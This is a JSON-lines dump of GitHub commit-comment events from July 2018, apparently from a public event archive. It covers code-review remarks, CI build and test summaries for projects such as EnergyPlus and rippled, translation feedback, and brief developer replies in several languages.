{"id":"7940864369","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649750,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-10T00:57:26Z","updated_at":"2018-07-10T00:57:26Z","author_association":"NONE","body":"158922394_Issue#4431 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1683 of 1683 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-10T00:57:26Z"}
{"id":"7940865100","type":"CommitCommentEvent","actor":{"login":"pityonline"},"repo":{"name":"wxy/TranslateProject"},"payload":{"comment":{"id":29649752,"position":79,"line":54,"path":"translated/tech/20180320 Migrating to Linux- Installing Software.md","commit_id":"d70bbf8d78abfc9f2e0b3e720e58cd1ab746b02d","created_at":"2018-07-10T00:57:44Z","updated_at":"2018-07-10T00:57:44Z","author_association":"NONE","body":"有个 typo，`</ruy>` 应为 `</ruby>`，这导致页面显示有些异常。再就是 RUBY 标签建议只在该名词或术语第一次出现时添加，不需要对同一名词重复添加。\r\n\r\n另外 `bells and whistles` 建议译出，作者在这里指的应该是 aptitude 的一些附加或额外功能，他的观点可能认为这些是华而不实的，花里胡哨的。BBC 有篇[关于 bells and whistles 的例文](http://www.bbc.co.uk/worldservice/learningenglish/language/theenglishwespeak/2014/07/140708_tews_183_bells_and_whistles.shtml)可以了解下。"}},"created_at":"2018-07-10T00:57:44Z"}
{"id":"7940866905","type":"CommitCommentEvent","actor":{"login":"tuanvpham"},"repo":{"name":"Visteus/Shopping-Manager"},"payload":{"comment":{"id":29649756,"position":null,"line":null,"path":null,"commit_id":"aa0ca59b141bce9d9b1360cf078578eb20f0bd51","created_at":"2018-07-10T00:58:28Z","updated_at":"2018-07-10T00:58:28Z","author_association":"COLLABORATOR","body":"Couple things about model, not just for Django but also other frameworks. First, class name always is singular (in this case is Transaction). Second, for the foreign key, userKey is not really conventional. You could use \"user\" or \"user_id\" instead. Finally, like I mentioned today, specifically for Django/Python, \"__str__\" sets up a \"nickname\" for the class when django produces its log (It's really useful and important, you just haven't seen it yet)"}},"created_at":"2018-07-10T00:58:28Z"}
{"id":"7940867381","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29649761,"position":null,"line":null,"path":null,"commit_id":"4f286bdd024d819638beb6f427abf9838b16b4cb","created_at":"2018-07-10T00:58:39Z","updated_at":"2018-07-10T00:58:39Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/4f286bdd024d819638beb6f427abf9838b16b4cb)\n\nBuilt at __20180710 - 00:58:39__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 563s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1239s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/coverage.txt) | 1035 cases, 0 failed, t: 688s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 795s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 516s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 150s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 493s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 121s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 249s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 337s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 353s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/2//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-10T00:58:39Z"}
{"id":"7940873881","type":"CommitCommentEvent","actor":{"login":"ozbillwang"},"repo":{"name":"ozbillwang/terraform-aws-eks"},"payload":{"comment":{"id":29649777,"position":null,"line":null,"path":null,"commit_id":"2173bbcfa926e48785c6ed6cd8dc935269f6a7c9","created_at":"2018-07-10T01:01:05Z","updated_at":"2018-07-10T01:01:05Z","author_association":"OWNER","body":"sure, let me think about it. \r\n\r\nIn my environment, I need a hot-fix, will apply like that, then back to your way with formal PR."}},"created_at":"2018-07-10T01:01:05Z"}
{"id":"7940874825","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"t-leguillou/tax-app"},"payload":{"comment":{"id":29649778,"position":28,"line":27,"path":"front/src/app/service/http.service.ts","commit_id":"577da828cc1961fc14c9cd47209a795aa7e0b5b4","created_at":"2018-07-10T01:01:27Z","updated_at":"2018-07-10T01:01:27Z","author_association":"NONE","body":"You can do it with a interceptor instead of emit an event for updating the token "}},"created_at":"2018-07-10T01:01:27Z"}
{"id":"7940875072","type":"CommitCommentEvent","actor":{"login":"3abkrino"},"repo":{"name":"3abkrino/SmartStairsLightSystem"},"payload":{"comment":{"id":29649780,"position":null,"line":null,"path":null,"commit_id":"a4004a662a1d08027ce1a7c9f6cad976eba1febd","created_at":"2018-07-10T01:01:32Z","updated_at":"2018-07-10T01:01:32Z","author_association":"OWNER","body":"May Allah Save Github ♥"}},"created_at":"2018-07-10T01:01:32Z"}
{"id":"7940880537","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"coreattack22/rankingshare"},"payload":{"comment":{"id":29649789,"position":null,"line":null,"path":null,"commit_id":"b400633880fd76424bee4690c3c1bb11cf45a21d","created_at":"2018-07-10T01:03:38Z","updated_at":"2018-07-10T01:03:38Z","author_association":"NONE","body":"##の後に半角スペースを入れるとマークダウンが正常反映されます。\r\n\r\n## 例"}},"created_at":"2018-07-10T01:03:38Z"}
{"id":"7940892808","type":"CommitCommentEvent","actor":{"login":"jamescassell"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":29649827,"position":5,"line":429,"path":"lib/ansible/modules/packaging/os/apt_repository.py","commit_id":"4e8bf6a94c85e7c5fb2821bef1da54fbcce73b00","created_at":"2018-07-10T01:08:37Z","updated_at":"2018-07-10T01:08:37Z","author_association":"CONTRIBUTOR","body":"Likewise, should support no_proxy."}},"created_at":"2018-07-10T01:08:37Z"}
{"id":"7940895961","type":"CommitCommentEvent","actor":{"login":"daltonwuuu"},"repo":{"name":"Ckiddo/Ability_to_specification_document_management_system"},"payload":{"comment":{"id":29649838,"position":null,"line":null,"path":null,"commit_id":"f20bfb6209bbac00ec58e1a5345dcde1a844ec52","created_at":"2018-07-10T01:09:53Z","updated_at":"2018-07-10T01:09:53Z","author_association":"COLLABORATOR","body":"细节已经完成！！可以检查！"}},"created_at":"2018-07-10T01:09:53Z"}
{"id":"7940896738","type":"CommitCommentEvent","actor":{"login":"Jhyung"},"repo":{"name":"Jhyung/Calculator-Android-"},"payload":{"comment":{"id":29649840,"position":null,"line":null,"path":null,"commit_id":"a3c5b5c3e8744adf578da318f049b6116828e989","created_at":"2018-07-10T01:10:11Z","updated_at":"2018-07-10T01:10:11Z","author_association":"OWNER","body":"소스코드, 사진, 보고서"}},"created_at":"2018-07-10T01:10:11Z"}
{"id":"7940898289","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29649844,"position":null,"line":null,"path":null,"commit_id":"e8275ee29b06e2884b68f262e9bb085b7efdc673","created_at":"2018-07-10T01:10:49Z","updated_at":"2018-07-10T01:10:49Z","author_association":"NONE","body":"157485520-FisherPedersenConvectEqRefTempBug (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e8275ee29b06e2884b68f262e9bb085b7efdc673-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T01:10:49Z"}
{"id":"7940898562","type":"CommitCommentEvent","actor":{"login":"MarcusMann"},"repo":{"name":"TiagoDanin/GHOffline"},"payload":{"comment":{"id":29649845,"position":31,"line":42,"path":"ghoffline","commit_id":"48cb91d6a66898e3ffe7e68f7d33b5088ebfe9ed","created_at":"2018-07-10T01:10:55Z","updated_at":"2018-07-10T01:10:55Z","author_association":"NONE","body":"Why you compare the `type_text` variable with `print text` if she's is a bool value."}},"created_at":"2018-07-10T01:10:55Z"}
{"id":"7940900844","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29649848,"position":null,"line":null,"path":null,"commit_id":"1efdacc097169dd5396db718957d29145e078a69","created_at":"2018-07-10T01:11:53Z","updated_at":"2018-07-10T01:11:53Z","author_association":"COLLABORATOR","body":"<h3>Prepare release v3.0.0 (#2661)</h3>\n\nPreview: <strong><a href='https://18117-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18117-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18117-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T01:11:53Z"}
{"id":"7940900976","type":"CommitCommentEvent","actor":{"login":"twobob"},"repo":{"name":"Unity-Technologies/AutoLOD"},"payload":{"comment":{"id":29649849,"position":null,"line":null,"path":null,"commit_id":"7959d5f78e3fa722b64f276ddec71953fd0f2378","created_at":"2018-07-10T01:11:56Z","updated_at":"2018-07-10T01:11:56Z","author_association":"NONE","body":"You foxed me for a while with the git@ suddenly wanting ssh thus failing links...  I just flipped them back for now.    Appreciate you keeping on top of this."}},"created_at":"2018-07-10T01:11:56Z"}
{"id":"7940902123","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"t-leguillou/tax-app"},"payload":{"comment":{"id":29649851,"position":1,"line":50,"path":"front/src/app/components/tax/tax.component.html","commit_id":"577da828cc1961fc14c9cd47209a795aa7e0b5b4","created_at":"2018-07-10T01:12:22Z","updated_at":"2018-07-10T01:12:22Z","author_association":"NONE","body":"Split each mat-form-field vertically"}},"created_at":"2018-07-10T01:12:22Z"}
{"id":"7940907633","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29649862,"position":null,"line":null,"path":null,"commit_id":"e4bcdf2c5dc632ccf2dcebd74a07a31e4de44342","created_at":"2018-07-10T01:14:30Z","updated_at":"2018-07-10T01:14:30Z","author_association":"COLLABORATOR","body":"<h3>Publish</h3>\n\nPreview: <strong><a href='https://18122-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18122-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18122-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-10T01:14:30Z"}
{"id":"7940919797","type":"CommitCommentEvent","actor":{"login":"HolyWu"},"repo":{"name":"vapoursynth/vapoursynth"},"payload":{"comment":{"id":29649885,"position":null,"line":null,"path":null,"commit_id":"be35946248caaaf8fedacc042da8e03b54d81703","created_at":"2018-07-10T01:19:12Z","updated_at":"2018-07-10T01:19:12Z","author_association":"CONTRIBUTOR","body":"How about letting this be a selectable feature and the users can set it via the attribute of core, like `core.large_page=True`?"}},"created_at":"2018-07-10T01:19:12Z"}
{"id":"7940929011","type":"CommitCommentEvent","actor":{"login":"JarvanMo"},"repo":{"name":"JarvanMo/Android-OkHttp-Jerry"},"payload":{"comment":{"id":29649911,"position":5,"line":7,"path":"README.md","commit_id":"3924ed40118b06689ac46bbe86441f9ec6718c75","created_at":"2018-07-10T01:22:54Z","updated_at":"2018-07-10T01:22:54Z","author_association":"OWNER","body":"见笑了金大神"}},"created_at":"2018-07-10T01:22:54Z"}
{"id":"7940947273","type":"CommitCommentEvent","actor":{"login":"WaitingLove"},"repo":{"name":"WaitingLove/HeadFirstModelAndDesign"},"payload":{"comment":{"id":29649945,"position":null,"line":null,"path":null,"commit_id":"be8a2ebc95521c4cfb1b62636984553b712e1357","created_at":"2018-07-10T01:30:08Z","updated_at":"2018-07-10T01:30:08Z","author_association":"OWNER","body":"设计模式原则：\r\n1、致力于交互对象之间的松耦合设计"}},"created_at":"2018-07-10T01:30:08Z"}
{"id":"7940948045","type":"CommitCommentEvent","actor":{"login":"MarcusMann"},"repo":{"name":"TiagoDanin/GHOffline"},"payload":{"comment":{"id":29649951,"position":34,"line":34,"path":"ghoffline","commit_id":"bc0cd10b8d68449e626d7f429a0c83d715b1b84e","created_at":"2018-07-10T01:30:23Z","updated_at":"2018-07-10T01:30:23Z","author_association":"NONE","body":"Why do you use this? If you not treat"}},"created_at":"2018-07-10T01:30:23Z"}
{"id":"7940950798","type":"CommitCommentEvent","actor":{"login":"mandarg"},"repo":{"name":"mandarg/rerun"},"payload":{"comment":{"id":29649958,"position":null,"line":null,"path":null,"commit_id":"e546b36ac5d9dd2c9a1c6a63ea203a3501283680","created_at":"2018-07-10T01:31:24Z","updated_at":"2018-07-10T01:31:24Z","author_association":"OWNER","body":"@alphapapa [Fixed](https://github.com/mandarg/rerun/commit/672022fab3a81d7ad09555bc509a89cc99364440), thanks for the reminder! Issue #4 tracks using something better than the screenshot for updated versions, if you have any ideas, let me know."}},"created_at":"2018-07-10T01:31:24Z"}
{"id":"7940954362","type":"CommitCommentEvent","actor":{"login":"aheza007"},"repo":{"name":"aimeirak/SalesTaxProblem"},"payload":{"comment":{"id":29649965,"position":10,"line":10,"path":"src/com/company/Tax.java","commit_id":"36a633e6833a8920340f877d8f01c4d4f9dce6e1","created_at":"2018-07-10T01:32:47Z","updated_at":"2018-07-10T01:32:47Z","author_association":"NONE","body":"what if the product is imported and also not exempted?"}},"created_at":"2018-07-10T01:32:47Z"}
{"id":"7940955399","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29649968,"position":null,"line":null,"path":null,"commit_id":"e3bdbcf839e285f416158d1a87a20aee504f4cd9","created_at":"2018-07-10T01:33:11Z","updated_at":"2018-07-10T01:33:11Z","author_association":"OWNER","body":"Yes - saw that email come in after the question. Good timing on all these pkg updates going to CRAN as the book nears completion. Good luck in the final weeks of term @jannes-m."}},"created_at":"2018-07-10T01:33:11Z"}
{"id":"7940956823","type":"CommitCommentEvent","actor":{"login":"WQPG"},"repo":{"name":"EnterpriseDB/zheap"},"payload":{"comment":{"id":29649972,"position":null,"line":null,"path":null,"commit_id":"b80e618a7df90013fb7a47c7055103a3ff462d8b","created_at":"2018-07-10T01:33:44Z","updated_at":"2018-07-10T01:33:44Z","author_association":"NONE","body":"./configure --prefix=/opt/zheap --exec-prefix=/opt/zheap --enable-thread_safety --with-pgport=5434 --with-blocksize=32  --with-segsize=4 --with-wal-blocksize=32 --with-trans-slots-per-zheap-page=16  --with-llvm --with-icu --with-tcl --with-perl --with-python  --with-gssapi --with-pam --with-ldap --with-openssl --with-selinux --with-systemd --with-readline --with-ossp-uuid --with-libxml  --with-libxslt --with-zlib  \r\n\r\nmake -j 6\r\nmake -j 6 world\r\n\r\n"}},"created_at":"2018-07-10T01:33:44Z"}
{"id":"7940958210","type":"CommitCommentEvent","actor":{"login":"bthaile"},"repo":{"name":"AugurProject/augur-app"},"payload":{"comment":{"id":29649977,"position":null,"line":null,"path":null,"commit_id":"c426cc6165dbc7087b240e26206465544cfe99d7","created_at":"2018-07-10T01:34:16Z","updated_at":"2018-07-10T01:34:16Z","author_association":"CONTRIBUTOR","body":"Nice"}},"created_at":"2018-07-10T01:34:16Z"}
{"id":"7940959190","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"phadkead/tax-calculator"},"payload":{"comment":{"id":29649979,"position":35,"line":30,"path":"service/taxCalculatorService.js","commit_id":"7ac4c83680dac129a58e169e9c2fe719d60f4afb","created_at":"2018-07-10T01:34:40Z","updated_at":"2018-07-10T01:34:40Z","author_association":"NONE","body":"You don't need to return a promise.resolve"}},"created_at":"2018-07-10T01:34:40Z"}
{"id":"7940959363","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"phadkead/tax-calculator"},"payload":{"comment":{"id":29649980,"position":46,"line":38,"path":"service/taxCalculatorService.js","commit_id":"7ac4c83680dac129a58e169e9c2fe719d60f4afb","created_at":"2018-07-10T01:34:45Z","updated_at":"2018-07-10T01:34:45Z","author_association":"NONE","body":"You don't need to return a promise.resolve"}},"created_at":"2018-07-10T01:34:45Z"}
{"id":"7940959371","type":"CommitCommentEvent","actor":{"login":"de0u"},"repo":{"name":"marijnh/Eloquent-JavaScript"},"payload":{"comment":{"id":29649981,"position":null,"line":null,"path":null,"commit_id":"2f3cbd525345a85d02c5b00d0cbc69173341e5b7","created_at":"2018-07-10T01:34:45Z","updated_at":"2018-07-10T01:34:45Z","author_association":"CONTRIBUTOR","body":"There is a technical sense in which \"command-line\" is correct because it is a \"compound adjective\": there is a kind of program which is \"programs run from a command line\", where a command line is a single distinct thing even though it is made up of two words.\r\n\r\nSaid differently, whether or not \"command line\" should have a hyphen depends on how it is used in a sentence.  \"I think you should solve this program from the command line\": definitely no hyphen.  \"I think you should take a command-line approach instead of a GUI approach\": there is a school of thought according to which the hyphen is correct.\r\n\r\nFor example:\r\nhttp://www.grammar.cl/english/compound-adjectives.htm\r\nhttps://www.gingersoftware.com/content/grammar-rules/adjectives/compound-adjectives/\r\n"}},"created_at":"2018-07-10T01:34:45Z"}
{"id":"7940967037","type":"CommitCommentEvent","actor":{"login":"binki"},"repo":{"name":"expo/exponent-server-sdk-node"},"payload":{"comment":{"id":29649999,"position":null,"line":null,"path":null,"commit_id":"96b1c6d7fd9ed2732cb31fc3840655bc687e956d","created_at":"2018-07-10T01:37:38Z","updated_at":"2018-07-10T01:37:38Z","author_association":"NONE","body":"Will we be getting a release with bundled typings soon? I had just written my own internal TypeScript typings—maybe I can throw that away now! :-D"}},"created_at":"2018-07-10T01:37:38Z"}
{"id":"7940969979","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29650002,"position":null,"line":null,"path":null,"commit_id":"6dade784a12873615fd47b0150e8f6f4796117ab","created_at":"2018-07-10T01:38:46Z","updated_at":"2018-07-10T01:38:46Z","author_association":"OWNER","body":"This is good but I think the duplicate link to the OGC is excessive - I will tweak the content now. Overall it's an important explanation of the benefits file formats supported by open standards ++"}},"created_at":"2018-07-10T01:38:46Z"}
{"id":"7940970910","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"phadkead/tax-calculator"},"payload":{"comment":{"id":29650004,"position":9,"line":12,"path":"routes/index.js","commit_id":"1b4f816537d6e1a10686d66efd431393b824113c","created_at":"2018-07-10T01:39:08Z","updated_at":"2018-07-10T01:39:08Z","author_association":"NONE","body":"Why you remove the return ? you needed to avoid another call to res and you also need to send a error message"}},"created_at":"2018-07-10T01:39:08Z"}
{"id":"7940971777","type":"CommitCommentEvent","actor":{"login":"wmww"},"repo":{"name":"preypreyprey067/prey-language"},"payload":{"comment":{"id":29650009,"position":15,"line":15,"path":"NodeTree.h","commit_id":"333e010002dea5bf395dd4473f30c6a59a3a7b2a","created_at":"2018-07-10T01:39:28Z","updated_at":"2018-07-10T01:39:28Z","author_association":"NONE","body":"The `token` parameter is not used, perhaps you meant `n->token = token` a few lines down?"}},"created_at":"2018-07-10T01:39:28Z"}
{"id":"7940972274","type":"CommitCommentEvent","actor":{"login":"niksseif"},"repo":{"name":"Brechy/fam"},"payload":{"comment":{"id":29650014,"position":null,"line":null,"path":null,"commit_id":"59da269226459b61842ee4843304edd5738d8e5c","created_at":"2018-07-10T01:39:39Z","updated_at":"2018-07-10T01:39:39Z","author_association":"COLLABORATOR","body":"This looks good to me i will merge"}},"created_at":"2018-07-10T01:39:39Z"}
{"id":"7940978115","type":"CommitCommentEvent","actor":{"login":"xxjwwf"},"repo":{"name":"xxjwwf/hello_world"},"payload":{"comment":{"id":29650024,"position":null,"line":null,"path":null,"commit_id":"ea189851df5b250c97e1ab2e7414651153b21a00","created_at":"2018-07-10T01:41:53Z","updated_at":"2018-07-10T01:41:53Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-10T01:41:53Z"}
{"id":"7940983962","type":"CommitCommentEvent","actor":{"login":"peterwkl2017"},"repo":{"name":"beichen2012/LabelMe"},"payload":{"comment":{"id":29650039,"position":null,"line":null,"path":null,"commit_id":"941a83a9871a8f509e4eb7955fdbdf1cdcb54b3a","created_at":"2018-07-10T01:44:11Z","updated_at":"2018-07-10T01:44:11Z","author_association":"NONE","body":"非常感谢！！！ 请问这个项目还有进行吗？  希望多多交流。\n\n\n\n\n\n\n在2018年07月05 09时41分, \"beichen2012\"<notifications@github.com>写道:\n\n\n\n是的。界面是仿LabelMe写的。移动这个功能没有加上。\n使用鼠标滚轮可以放大2级（这个可能有bug，没有测），在放大模式下，可以拖动图片。\n\njson里面包含了相应的坐标数据。PNG标记文件可能通过json来生成（比如使用cv2.drawContours，line_width=-1即可生成）。\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-10T01:44:11Z"}
{"id":"7940986683","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"phadkead/tax-calculator"},"payload":{"comment":{"id":29650045,"position":27,"line":27,"path":"app.js","commit_id":"f4758635777c288840f5a6e7b8234ffc77a99dab","created_at":"2018-07-10T01:45:12Z","updated_at":"2018-07-10T01:45:12Z","author_association":"NONE","body":"Remove this line cause you don't use pug"}},"created_at":"2018-07-10T01:45:12Z"}
{"id":"7940992497","type":"CommitCommentEvent","actor":{"login":"wyam"},"repo":{"name":"phadkead/tax-calculator"},"payload":{"comment":{"id":29650056,"position":null,"line":null,"path":null,"commit_id":"b30917ecc14a1cc91590e82481ca196821c9db23","created_at":"2018-07-10T01:47:16Z","updated_at":"2018-07-10T01:47:16Z","author_association":"NONE","body":"You should add one integration test to test your calculation app works well"}},"created_at":"2018-07-10T01:47:16Z"}
{"id":"7940992509","type":"CommitCommentEvent","actor":{"login":"enongi"},"repo":{"name":"enongi/springboot-learning"},"payload":{"comment":{"id":29650057,"position":null,"line":null,"path":null,"commit_id":"6797c6dba38fa46443e681958feb70692bb5a99b","created_at":"2018-07-10T01:47:16Z","updated_at":"2018-07-10T01:47:16Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-10T01:47:16Z"}
{"id":"7940997320","type":"CommitCommentEvent","actor":{"login":"mchamberland"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":29650072,"position":null,"line":null,"path":null,"commit_id":"b593b1f6ebee035568c86e1c942ec723cbd541e3","created_at":"2018-07-10T01:49:05Z","updated_at":"2018-07-10T01:49:05Z","author_association":"CONTRIBUTOR","body":"This is awesome! Just tested it on a simple example on my Mac (with Qt5). Everything works as expected so far.\r\n\r\nAny chance a user could manually load a 3ddose file from the file menu? egs_brachy does not require egs_ausgab_object to score 3ddose files, so I have to add a dummy object in my input file to point egs_view to the right dose file."}},"created_at":"2018-07-10T01:49:05Z"}
{"id":"7940998230","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29650075,"position":1,"line":null,"path":"1531187363.82/github_test.txt","commit_id":"42c5e71b7c0007707dd4768d92c44e2f8917fe12","created_at":"2018-07-10T01:49:26Z","updated_at":"2018-07-10T01:49:26Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-10T01:49:26Z"}
{"id":"7941002278","type":"CommitCommentEvent","actor":{"login":"Smallfox"},"repo":{"name":"Smallfox/leetcode"},"payload":{"comment":{"id":29650081,"position":null,"line":null,"path":null,"commit_id":"19b7af0adff841f0f2d70de06de7e1ba2d545d0f","created_at":"2018-07-10T01:51:00Z","updated_at":"2018-07-10T01:51:00Z","author_association":"OWNER","body":"Two Sum"}},"created_at":"2018-07-10T01:51:00Z"}
{"id":"7941010862","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29650093,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T01:54:11Z","updated_at":"2018-07-10T01:54:11Z","author_association":"NONE","body":"Hi. Awesome work on ovale, ty very much! But, wondering, why did you add this restriction? There is other useful unitID like \"mouseover\" and \"party№\" to read aura from. Thanks in advance for your reply! "}},"created_at":"2018-07-10T01:54:11Z"}
{"id":"7941019266","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29650101,"position":null,"line":null,"path":null,"commit_id":"cb61dc3763768bd7987a4ac8dbf13a1bd29b160a","created_at":"2018-07-10T01:57:26Z","updated_at":"2018-07-10T01:57:26Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2916 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 609\n * Failed: 16\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cb61dc3763768bd7987a4ac8dbf13a1bd29b160a-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.45%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T01:57:26Z"}
